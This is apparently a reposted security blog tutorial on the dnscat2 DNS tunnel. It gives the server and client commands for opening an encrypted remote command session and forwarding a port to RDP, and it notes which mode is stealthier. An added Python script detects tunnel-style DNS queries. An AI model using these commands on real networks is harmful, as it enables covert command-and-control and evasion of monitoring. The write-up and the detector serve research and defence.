dnscat2 proxy tunnel

admin 2023-12-15 19:12:28

dnscat2 is a proxy tunnel built on top of the DNS protocol. Besides port forwarding it also offers command execution and file transfer, though in practice none of these work particularly well.

Its principle is similar to DNS Log, and it has two modes: direct and relay. In direct mode the client connects straight to port 53 on the server, which is fast but easily noticed; in relay mode data is carried by recursive queries for a domain you configure, which is slow but far stealthier.

For the domain configuration used in relay mode, refer to the dns_beacon setup in Cobalt Strike.

The server is written in Ruby, the client in C, and there is also a PowerShell version.

# ruby dnscat2.rb
New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]...

It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53 --secret=33971b1d1593d219ac8ed615d5339180

Of course, you have to figure out <server> yourself! Clients
will connect directly on UDP port 53.

dnscat2> 

A different secret key is generated on every run.

C:\> dnscat2.exe  --dns server=192.168.1.100,port=53 --secret=33971b1d1593d219ac8ed615d5339180
Creating DNS driver:
 domain = (null)
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = 192.168.1.100

** Peer verified with pre-shared secret!

Session established!
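The client output above shows the record types dnscat2 uses (TXT, CNAME, MX), and in relay mode every query passes through the recursive resolver, so resolver query logs are where a defender can look for it. The following Python example is added here and is not part of the original post or the dnscat2 project: it flags clients that send many TXT/CNAME/MX queries carrying long hex-encoded labels under a single zone. The log format, the sample lines, the hex-label heuristic and the "zone = last three labels" rule are all assumptions.

```python
import re
from collections import defaultdict

# Constructed sample resolver log lines (not from the page): "<client> <qtype> <qname>".
# 10.0.0.9 issues tunnel-style queries; 10.0.0.5 is ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 AAAA mail.example.com
10.0.0.9 TXT 6e2ea1b7c0d4e5f6a7b8c9d0e1f2a3b4.c5d6e7f8091a2b3c.tunnel.example.net
10.0.0.9 CNAME 7f3ab1c2d3e4f5061728394a5b6c7d8e.9fa0b1c2d3e4f506.tunnel.example.net
10.0.0.9 MX 8a4bc2d3e4f50617283a4b5c6d7e8fa0.b1c2d3e4f5061728.tunnel.example.net
10.0.0.9 TXT 9b5cd3e4f506172839a4b5c6d7e8f9a1.c2d3e4f506172839.tunnel.example.net
10.0.0.5 TXT _dmarc.example.com
"""

# Record types the dnscat2 client advertises (type = TXT,CNAME,MX in the output above).
TUNNEL_QTYPES = {"TXT", "CNAME", "MX"}
# Assumption: a label of 16+ lowercase hex characters is treated as encoded payload.
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$")


def parse_line(line):
    """Split one log line into (client, qtype, normalised qname)."""
    client, qtype, qname = line.split()
    return client, qtype.upper(), qname.lower().rstrip(".")


def is_suspicious_query(qtype, qname):
    """A single query is suspicious if it uses a tunnel record type and has a long hex label."""
    labels = qname.split(".")
    return qtype in TUNNEL_QTYPES and any(HEX_LABEL.match(label) for label in labels)


def score_clients(log_text, threshold=3):
    """Count suspicious queries per (client, zone) and return pairs at or above threshold."""
    counts = defaultdict(int)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        client, qtype, qname = parse_line(line)
        if is_suspicious_query(qtype, qname):
            zone = ".".join(qname.split(".")[-3:])  # assumption: zone is the last three labels
            counts[(client, zone)] += 1
    return {key: n for key, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for (client, zone), n in score_clients(SAMPLE_LOG).items():
        print(f"{client} -> {zone}: {n} tunnel-style queries")
```

On the constructed sample the only hit is 10.0.0.9 against tunnel.example.net; the legitimate `_dmarc` TXT lookup from 10.0.0.5 is not flagged because it carries no hex label.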

In dnscat2 a session is called a window, since switching between sessions is done with ctrl-z.

dnscat2> New window created: 1
Session 1 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)

dnscat2> windows
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53 domains =  [*]
  1 :: command (LAPTOP) [encrypted and verified] [*]
dnscat2> 

Create a port forward.

(the security depends on the strength of your pre-shared secret!)
This is a command session!

That means you can enter a dnscat2 command such as
'ping'! For a full list of clients, try 'help'.

command (LAPTOP) 1> listen 1234 127.0.0.1:3389
Listening on 0.0.0.0:1234, sending connections to 127.0.0.1:3389
command (LAPTOP) 1> 

For further usage, see the README.md.

- By:X1r0z[exp10it.cn]

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear full legal and joint liability; this site assumes no legal or joint liability. For any issue, contact us by e-mail (an enterprise or other valid mailbox is recommended so the mail is not blocked; contact details are on the home page).
Original link (CN-SEC中文网, with thanks to the original author): http://cn-sec.com/archives/2304655.html